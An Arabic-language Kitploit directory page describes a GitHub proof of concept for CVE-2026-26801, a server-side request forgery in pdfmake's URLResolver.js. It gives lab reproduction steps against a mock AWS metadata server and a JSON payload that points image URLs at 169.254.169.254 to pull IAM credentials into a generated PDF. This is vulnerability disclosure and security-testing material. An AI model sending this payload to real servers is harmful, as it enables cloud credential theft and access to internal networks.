Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-26801-pdfmake-ssrf — # إثبات المفهوم لـ CVE-2026-26801: SSRF في pdfmake URLResolver.js (>= 0.3.0-beta.2, <= 0.3.5) | Kitploit
أدوات/GitHubGitHub/mariopepe/cve-2026-26801-pdfmake-ssrf
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويباختبار الاختراق
GitHubmariopepe/cve-2026-26801-pdfmake-ssrf

CVE-2026-26801-pdfmake-ssrf

# إثبات المفهوم لـ CVE-2026-26801: SSRF في pdfmake URLResolver.js (>= 0.3.0-beta.2, <= 0.3.5)

عرض المستودع
منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

ثغرة SSRF في pdfmake - إثبات المفهوم (PoC)

ملخص الثغرة

الحقلالقيمة
الحزمةpdfmake
الإصدار>= 0.3.0-beta.2, <= 0.3.5
الإصدار المُصلَح0.3.6
CVECVE-2026-26801
النوعتزوير الطلبات من جانب الخادم (SSRF)
الموقعsrc/URLResolver.js
الخطورةعالية

السبب الجذري

root@kitploit:~
// URLResolver.js line 3
const response = await fetch(url, { headers });  // NO VALIDATION!

عندما يحتوي docDefinition على عناوين URL في images أو attachments أو files، يقوم pdfmake بجلبها دون أي تحقق:

  • لا توجد قائمة مسموحة/ممنوعة للنطاقات
  • لا توجد حماية ضد عناوين IP الداخلية (127.0.0.1, 169.254.169.254, 10.x.x.x)
  • دعم الترويسات المخصصة (يتيح تجاوز المصادقة)

إعادة الإنتاج

الإعداد

root@kitploit:~
npm install

الطرفية 1 - خادم بيانات AWS الوصفية الوهمي

root@kitploit:~
npm run metadata

الطرفية 2 - خادم PDF الضعيف

root@kitploit:~
npm run server

الطرفية 3 - تنفيذ الهجوم

SSRF أعمى (يُثبت أن الخادم يُصدر طلبات خارجية):

root@kitploit:~
npm run attack

SSRF بقراءة كاملة (بيانات الاعتماد مضمّنة في ملف PDF المُنشأ):

root@kitploit:~
npm run exfiltrate

النتائج المتوقعة

SSRF أعمى (npm run attack)

مخرجات خادم البيانات الوصفية:

root@kitploit:~
[METADATA] GET /latest/meta-data/iam/security-credentials/vulnerable-ec2-role
[METADATA] >>> CREDENTIALS LEAKED! <<<

هذا يُثبت أن الخادم الضعيف أصدر طلبًا خارجيًا إلى نقطة النهاية التي نتحكم بها.

SSRF بقراءة كاملة (npm run exfiltrate)

يُنشئ سكربت الهجوم ملف exfiltrated.pdf. افتحه في أي عارض PDF وستجد بيانات اعتماد AWS بصيغة JSON مضمّنة كمرفق ملف (metadata.json). هذا يُثبت سرقة بيانات كاملة، وليس مجرد SSRF أعمى. يحصل المهاجم على نص الاستجابة الفعلي داخل ملف PDF.

التأثير في العالم الحقيقي

  1. سرقة بيانات اعتماد AWS/GCP/Azure - الوصول إلى نقاط نهاية البيانات الوصفية السحابية
  2. الوصول إلى الشبكة الداخلية - الوصول إلى الخدمات الداخلية
  3. فحص المنافذ - تعداد البنية التحتية الداخلية
  4. تجاوز المصادقة - ترويسات مخصصة لتجاوز المصادقة

حمولة الهجوم

root@kitploit:~
{
  "content": ["Hello"],
  "images": {
    "x": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
  }
}

التوثيق الفني

توثيق فني كامل مع قصة كيفية اكتشاف هذه الثغرة، وسلسلة الهجوم، والجدول الزمني للإفصاح: mariopepe.github.io/cve-2026-26801-pdfmake-ssrf

تنزيل الأداة